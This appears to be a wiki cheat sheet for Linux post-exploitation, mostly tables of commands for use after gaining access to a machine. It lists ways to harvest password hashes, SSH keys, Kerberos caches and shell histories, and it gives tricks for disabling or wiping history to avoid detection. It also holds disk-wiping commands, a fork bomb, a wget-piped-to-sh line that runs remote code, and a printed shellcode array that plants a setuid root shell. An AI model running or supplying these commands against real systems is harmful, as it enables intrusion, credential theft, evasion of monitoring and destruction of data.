post exploit linux

David Van Mosselbeen edited this page Aug 8, 2021 · 8 revisions

Linux Post Exploit

Information Gathering

Blind Files

Things to pull when all you can do is blindly read, as in LFI or directory traversal. Don't forget %00: a trailing null byte truncates the path in older PHP (fixed in 5.3.4) and drops any extension the application appends.

| File | Contents and Reason |
| --- | --- |
| /etc/resolv.conf | Current name servers (DNS) for the system. World-readable, and less likely to trigger IDS alerts than /etc/passwd |
| /etc/motd | Message of the day |
| /etc/issue | Current version of the distro |
| /etc/passwd | List of local users |
| /etc/shadow | Users' password hashes (requires root) |
| /home/xxx/.bash_history | Gives you some directory context |

System

| Command | Description and/or Reason |
| --- | --- |
| uname -a | Prints the kernel version, arch, sometimes distro |
| ps aux | List all running processes |
| top -b -n 1 | Print the process list once; -b is batch mode, -n is the number of iterations |
| id | Your current username, groups |
| arch, uname -m | Kernel processor architecture |
| w | Who is connected, uptime and load avg |
| who -a | Uptime, runlevel, tty, processes etc. |
| df -k | Mounted fs, size, % use, dev and mount point |
| mount | Mounted fs |
| last -a | Last users logged on (reads /var/log/wtmp) |
| lastb | Failed login attempts (reads /var/log/btmp, requires root) |
| lastcomm | Not installed by default; GNU accounting utilities for process and login accounting |
| lastlog | Show when each user last logged in |
| lastlogin | On BSD systems |
| getenforce | Get the status of SELinux (Enforcing, Permissive or Disabled) |
| dmesg | Kernel ring buffer: messages since the last boot (needs root when kernel.dmesg_restrict=1) |
| lspci | Prints all PCI buses and devices |
| lsusb | Prints all USB buses and devices |
| lscpu | Prints CPU information |
| lshw | List hardware information |
| cat /proc/cpuinfo | CPU details, also works without lscpu |
| cat /proc/meminfo | Memory totals and usage |
| du -h --max-depth=1 / | Disk usage per top-level directory; note: can cause heavy disk I/O |
| which nmap | Locate a command (i.e. nmap or nc) |
| locate bin/nmap | |
| locate bin/nc | |
| jps -l | Running Java processes with their main class or jar (JDK tool) |

Network

| Command | Description and/or Reason |
| --- | --- |
| hostname -f | Long host name (FQDN) |
| ip addr | Show IP information |
| ip route | Show IP route |
| ifconfig -a | All interfaces, including those that are down (legacy net-tools) |
| route -n | Show IP route |
| cat /etc/network/interfaces | Debian-style interface configuration |
| iptables -L -n -v | Filter table rules with packet counters |
| iptables -t nat -L -n -v | NAT table: port forwards, masquerading |
| ip6tables -L -n -v | IPv6 rules |
| iptables-save | Dump every table in one go |
| netstat -anop | All sockets, numeric, with owning process and timers |
| netstat -r | Routing table |
| netstat -nltupw | Listening TCP/UDP and raw sockets; -p only shows other users' processes as root, -w needs root for raw sockets |
| arp -a | Show ARP table with IP info |
| lsof -nPi | Open network sockets and their processes, numeric |
| cat /proc/net/* | More discreet: all the information given by the commands above can be found by reading the files under /proc/net, which is less likely to trigger monitoring |
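Reading /proc/net/tcp directly avoids spawning netstat or ss, but the kernel writes addresses and ports as hex, with IPv4 octets in host byte order (reversed on x86). The POSIX shell script below is an added example, not code from the original page: it decodes that format into readable endpoints, states and owning uids. The two records in SAMPLE are constructed for illustration; the address-byte order it assumes is that of little-endian hosts.

```shell
#!/bin/sh
# Decode /proc/net/tcp without netstat or ss. Added example; the SAMPLE
# records below are constructed, not copied from a real host.

# Map the hex "st" column to the kernel's TCP state names.
tcp_state() {
  case "$1" in
    01) echo ESTABLISHED ;; 02) echo SYN_SENT ;;   03) echo SYN_RECV ;;
    04) echo FIN_WAIT1 ;;   05) echo FIN_WAIT2 ;;  06) echo TIME_WAIT ;;
    07) echo CLOSE ;;       08) echo CLOSE_WAIT ;; 09) echo LAST_ACK ;;
    0A) echo LISTEN ;;      0B) echo CLOSING ;;    *)  echo "UNKNOWN($1)" ;;
  esac
}

# "0100007F:0016" -> "127.0.0.1:22". On little-endian hosts (x86) the four
# address bytes appear reversed, so the last hex pair is the first octet.
hex2addr() {
  ip=${1%%:*}; port=${1##*:}
  o1=${ip#??????}
  r=${ip%??};  o2=${r#????}
  r=${r%??};   o3=${r#??}
  o4=${r%??}
  printf '%d.%d.%d.%d:%d\n' $((0x$o1)) $((0x$o2)) $((0x$o3)) $((0x$o4)) $((0x$port))
}

# Read /proc/net/tcp format on stdin; print "local remote STATE uid=N" per socket.
# Column 8 of each record is the uid that owns the socket.
decode_proc_net_tcp() {
  while read -r sl laddr raddr st txrx trtm retr uid rest; do
    [ "$sl" = "sl" ] && continue   # skip the header row
    printf '%s %s %s uid=%s\n' "$(hex2addr "$laddr")" "$(hex2addr "$raddr")" \
      "$(tcp_state "$st")" "$uid"
  done
}

# Constructed sample: an sshd listener owned by root, and one outbound HTTPS
# connection from uid 1000 to 93.184.216.34.
SAMPLE='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:8F2A 22D8B85D:01BB 01 00000000:00000000 02:00000A1C 00000000  1000        0 23456 1 0000000000000000 20 4 30 10 -1'

printf '%s\n' "$SAMPLE" | decode_proc_net_tcp
# On a live host: decode_proc_net_tcp < /proc/net/tcp   (same layout in /proc/net/udp)
```

The same approach works for /proc/net/udp and /proc/net/raw; /proc/net/tcp6 uses 32 hex digits per address and needs a different octet shuffle. The inode column at the end of each record maps back to a process through /proc/*/fd, which is how netstat -p does it.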

User Accounts

| Command | Description and/or Reason |
| --- | --- |
| cat /etc/passwd | Local accounts |
| cat /etc/shadow | Password hashes on Linux |
| /etc/security/passwd | Password hashes on AIX |
| cat /etc/group | Groups (or /etc/gshadow) |
| getent passwd | Should dump all local, LDAP, NIS, whatever the system is using |
| getent group | Same for groups |
| pdbedit -L -w | Samba's own database, smbpasswd-style output including the hashes |
| pdbedit -L -v | Same, verbose |
| cat /etc/aliases | Mail aliases |
| find /etc -name aliases | |
| getent aliases | |
| ypcat passwd | Displays the NIS password file |

Obtain user's information

| Command | Description and/or Reason |
| --- | --- |
| ls -alh /home/*/ | |
| ls -alh /home/*/.ssh/ | SSH files, hopefully finding private keys |
| cat /home/*/.ssh/authorized_keys | SSH authorized keys |
| cat /home/*/.ssh/known_hosts | SSH known hosts files (entries are hashed if HashKnownHosts is set) |
| cat /home/*/.*hist* | Shell history files, you can learn a lot from these |
| grep ^ssh /home/*/.*hist* | Hosts the user connects to |
| grep ^telnet /home/*/.*hist* | |
| grep ^mysql /home/*/.*hist* | Database hosts, sometimes with a password passed via -p |
| find /home/*/.vnc /home/*/.subversion -type f | VNC and Subversion stored credentials |
| cat /home/*/.viminfo | Recently edited files, search and command history |
| sudo -l | If sudoers is not readable, this sometimes works per user |
| crontab -l | |
| cat /home/*/.mysql_history | |
| sudo -p | Lets the user define the password prompt string; useful for prompt customization with aliases or shell scripts |

Credentials

| File/Folder | Description and/or Reason |
| --- | --- |
| /home/*/.ssh/id* | SSH keys, often passwordless |
| /tmp/krb5cc_* | Kerberos ticket caches |
| /tmp/krb5.keytab | Kerberos keytab (long-term keys rather than tickets; the usual location is /etc/krb5.keytab) |
| /home/*/.gnupg/secring.gpg | PGP secret keys (GnuPG 1.x; 2.1 and later keep them under private-keys-v1.d/) |

Configs

| File/Folder | Description and/or Reason |
| --- | --- |
| ls -aRl /etc/ \| awk '$1 ~ /w.$/' \| grep -v lrwx 2>/dev/null | Other-writable entries under /etc (mode string ending in w?), excluding symlinks |
| cat /etc/issue{,.net} | Login banners |
| cat /etc/master.passwd | BSD password file |
| cat /etc/group | |
| cat /etc/hosts | |
| cat /etc/crontab | System crontab |
| cat /etc/sysctl.conf | Kernel parameters |
| for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done | Lists all crons (crontab -u needs root) |
| cat /etc/resolv.conf | |
| cat /etc/syslog.conf | Where logs go (also rsyslog.conf) |
| cat /etc/chttp.conf | |
| cat /etc/lighttpd.conf | |
| cat /etc/cups/cupsd.conf | |
| cat /etc/inetd.conf | |
| cat /opt/lampp/etc/httpd.conf | |
| cat /etc/samba/smb.conf | |
| cat /etc/openldap/ldap.conf | |
| cat /etc/ldap/ldap.conf | |
| cat /etc/exports | NFS exports |
| cat /etc/auto.master | Automounter maps |
| cat /etc/auto_master | |
| cat /etc/fstab | |
| find /etc/sysconfig/ -type f -exec cat {} \; | Red Hat service configuration |

Determine Distro

| File | Description and/or Reason |
| --- | --- |
| uname -a | Often hints at it pretty well |
| lsb_release -d | Generic command for all LSB distros |
| /etc/os-release | Generic for distros using systemd |
| /etc/issue | Generic but often modified |
| cat /etc/*release | |
| /etc/SUSE-release | Novell SUSE |
| /etc/redhat-release, /etc/redhat_version | Red Hat |
| /etc/fedora-release | Fedora |
| /etc/slackware-release, /etc/slackware-version | Slackware |
| /etc/debian_release, /etc/debian_version | Debian |
| /etc/mandrake-release | Mandrake |
| /etc/sun-release | Sun JDS |
| /etc/release | Solaris/Sparc |
| /etc/gentoo-release | Gentoo |
| /etc/arch-release | Arch Linux (file will be empty) |
| arch | OpenBSD; sample: "OpenBSD.amd64" |

Installed Packages

| Command | Description and/or Reason |
| --- | --- |
| rpm -qa --last \| head | Red Hat family, most recently installed first |
| yum list installed | Red Hat family |
| dpkg -l | Debian |
| dpkg --get-selections | Debian |
| pkg_info | {Free,Net}BSD |
| pkginfo | Solaris |
| cd /var/db/pkg/ && ls -d */* | Gentoo |
| pacman -Q | Arch Linux |

Package Sources

| Command | Description and/or Reason |
| --- | --- |
| cat /etc/apt/sources.list | Debian |
| ls -l /etc/yum.repos.d/ | Red Hat family |
| cat /etc/yum.conf | |

Finding Important Files

| Command | Description and/or Reason |
| --- | --- |
| ls -dlR */ | Recursive directory listing from the current directory |
| find /var -type d | All directories under /var |
| ls -alR \| grep ^d | Only directories from a recursive listing |
| ls -dl $(find /var -type d) | Permissions of every directory under /var |
| ls -dl $(find /var -type d) \| grep -v root | Directories under /var not owned by root |
| find /var ! -user root -type d -ls | Same, in a single find |
| find /var/log -type f -exec ls -la {} \; | Log files with their permissions |
| find / -perm -4000 | Find all setuid files |
| ls -alhtr /mnt | |
| ls -alhtr /media | |
| ls -alhtr /tmp | |
| ls -alhtr /home | Sorted by modification time, newest last |
| cd /home/; tree | Directory tree of all home directories |
| ls /home/*/.ssh/* | SSH key material per user |
| find /home -type f -iname '.*history' | Shell and tool history files |
| ls -lart /etc/rc.d/ | Init scripts (Red Hat/Slackware layout) |
| locate tar \| grep [.]tar$ | Archives; remember to run updatedb before using locate |
| locate tgz \| grep [.]tgz$ | |
| locate sql \| grep [.]sql$ | Database dumps |
| locate settings \| grep [.]php$ | PHP application settings |
| locate config.inc \| grep [.]php$ | PHP config includes |
| ls /home/*/id* | |
| locate .properties \| grep [.]properties | Java config files |
| locate .xml \| grep [.]xml | Java/.NET config files |
| find /sbin /usr/sbin /opt /lib $(echo $PATH \| sed 's/:/ /g') -perm /6000 -ls | Find setuid and setgid files; -perm /6000 (GNU find) matches either bit |
| locate rhosts | .rhosts trust files |

Also, check http://incolumitas.com/uploads/2012/12/blackhats_view.pdf for some one-liners that find world writable directories/files and more.
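The one-liners above all reduce to a handful of find predicates. The POSIX shell functions below are an added example, not code from the original page or the linked PDF: they collect the usual privilege-escalation candidates (setuid/setgid binaries, world-writable directories without the sticky bit, world-writable files) under a chosen root and print each with its owner and mode. They use only portable predicates, so they also work where GNU's -perm /6000 is unavailable.

```shell
#!/bin/sh
# Added example: collect the classic privilege-escalation file candidates.
# Each function takes an optional root directory (default /) and stays on one
# filesystem (-xdev) so /proc, /sys and network mounts are skipped.

# Setuid or setgid regular files. Portable equivalent of GNU's -perm /6000.
find_suid_sgid() {
  find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# World-writable directories without the sticky bit: anyone can rename or
# delete other users' files there, which is what symlink races against cron
# jobs and setuid helpers need.
find_ww_dirs_nosticky() {
  find "${1:-/}" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# World-writable regular files (configs, scripts run by root, .ssh material).
find_ww_files() {
  find "${1:-/}" -xdev -type f -perm -0002 2>/dev/null
}

# Print each candidate with owner and mode, one section per check.
report() {
  root=${1:-/}
  for check in find_suid_sgid find_ww_dirs_nosticky find_ww_files; do
    echo "== $check $root"
    "$check" "$root" | while read -r path; do ls -ld "$path"; done
  done
}

report "${1:-/}"
```

Run it with a directory argument to limit the scan (for example /usr or /opt); setuid binaries that are not owned by root, or that live in a directory you can write to, are the ones worth a second look.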

Other Utilities

| Command | Description and/or Reason |
| --- | --- |
| sort | Sort a text file |

Covering Your Tracks

Avoiding history files

  • export HISTFILE=
    or
  • unset HISTFILE

This next one might not be a good idea: a lot of folks know to check for tampering with this file and will be suspicious if they notice it.

However, if you happen to be on an account that was originally inaccessible, and the .bash_history file is available (ls -a ~), viewing its contents can provide a good deal of information about the system and its most recent updates/changes.

Clear all history in RAM:

| Command | Description and/or Reason |
| --- | --- |
| history -c | Clear the in-memory history list |
| rm -rf ~/.bash_history && ln -s /dev/null ~/.bash_history | Invasive; the symlink makes every later write disappear |
| touch ~/.bash_history | Invasive |
| <space> history -c | A leading space keeps a command out of history, but only when HISTCONTROL contains ignorespace or ignoreboth |
| zsh% unset HISTFILE HISTSIZE | |
| tcsh% set history=0 | |
| bash$ set +o history | Stop recording for the rest of the session |
| ksh$ unset HISTFILE | |
| find / -type f -exec {} | Forensics nightmare |

Note that you're probably better off modifying or temporarily disabling history than deleting the files: it leaves far fewer traces and is less suspicious.

In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing the history (history -c) or by killing the shell with kill -9 $$ so it never gets to write the file on exit. Sometimes the shell is configured to run history -w after every command (typically from PROMPT_COMMAND); get around this by overriding history with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, or if auditd or process accounting records commands independently of the shell.
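Before picking one of the tricks above it pays to check how history is actually controlled on the box. The POSIX shell snippet below is an added example, not code from the original page: it reports where history goes, which of the relevant variables are read-only, whether history has been replaced by a function or alias, and whether bash's PROMPT_COMMAND forces a write after each command. The variable and function names are the standard bash ones; nothing here is specific to the page's author.

```shell
#!/bin/sh
# Added example: inspect shell history controls before touching them.

# "yes" if the named variable is read-only: the assignment in a subshell fails.
is_readonly() {
  ( eval "$1=probe" ) 2>/dev/null && echo no || echo yes
}

# "yes" if PROMPT_COMMAND (bash runs it before every prompt) flushes history,
# e.g. the common 'history -a; history -c; history -r' setup.
prompt_writes_history() {
  case "${PROMPT_COMMAND:-}" in
    *history*) echo yes ;;
    *)         echo no ;;
  esac
}

# "yes" if `history` resolves to a function or alias rather than the builtin,
# meaning "history -c" may be a no-op or, worse, a tripwire.
history_overridden() {
  case "$(type history 2>/dev/null)" in
    *function*|*alias*) echo yes ;;
    *)                  echo no ;;
  esac
}

history_controls() {
  printf 'HISTFILE=%s\n' "${HISTFILE:-<unset>}"
  for v in HISTFILE HISTFILESIZE HISTSIZE HISTCONTROL; do
    printf '%-12s readonly=%s\n' "$v" "$(is_readonly "$v")"
  done
  printf 'history overridden: %s\n' "$(history_overridden)"
  printf 'PROMPT_COMMAND writes history: %s\n' "$(prompt_writes_history)"
}

history_controls
```

If HISTFILE is read-only and PROMPT_COMMAND flushes after every command, the in-memory tricks are pointless and you are left with the kill -9 $$ or no-op function approaches described above; if syslog or auditd logging is in place, none of them help.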

Deleting and Destroying

Do not tell me you are that kind of bitch!

Only if it is necessary to leave the machine inaccessible or unusable. Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into trouble.
Oh, and you're probably a jerk if you use any of the stuff below.

| Command | Description and/or Reason |
| --- | --- |
| rm -rf / | Recursively tries to delete all files (GNU rm refuses the bare root unless --no-preserve-root is given) |
| mkfs.ext3 /dev/sda | Reformat the named device, making recovery of files hard |
| dd if=/dev/zero of=/dev/sda bs=1M | Overwrite disk /dev/sda with zeros |

  • "Hex version of rm -rf /": this snippet circulates under that name, but it is not rm -rf at all. The bytes are 32-bit x86 shellcode (\xb0\x0b\xcd\x80 is execve via int 0x80) and the tail of the array spells out its real arguments: "/bin/sh", "-c" and the command string that follows. Run as root it copies /bin/sh to /tmp/.beyond and makes it setuid root, i.e. it plants a backdoor for whoever pasted it. Never compile or run shellcode you have not decoded.

```c
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ =
    "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
```

  • Fork bomb: the [in]famous "fork bomb". The function named : calls itself twice, once through a pipe and once in the background, so the process count doubles until the process table or pid limit is exhausted and the system "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone long enough a system can sometimes recover; a per-user process limit (ulimit -u, or a pids cgroup) is what actually contains it.

```bash
:(){ :|:& };:
```

Escalating

Looking for possible open paths

See the great linPEAS tool!: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

| Command | Description and/or Reason |
| --- | --- |
| ls -alh /root/ | Root's home, if readable |
| sudo -l | Commands this user may run through sudo |
| cat /etc/sudoers | Sudo policy (also check /etc/sudoers.d/) |
| cat /etc/shadow | Password hashes |
| cat /etc/master.passwd | Same on OpenBSD |
| cat /var/spool/cron/crontabs/* | Per-user crontabs (Debian layout) |
| cat /var/spool/cron/* | Per-user crontabs (Red Hat layout) |
| lsof -nPi | Network sockets and the processes holding them |
| ls /home/*/.ssh/* | SSH keys |

Maintaining control

Reverse Shell

See the dedicated document: Reverse Shell

Execute a Remote Script

wget http://server/file.sh -O- | sh
Downloads the script to standard output and pipes it straight into a shell: nothing is written to disk, but the fetch shows up in DNS and proxy logs and the wget process in ps while it runs.
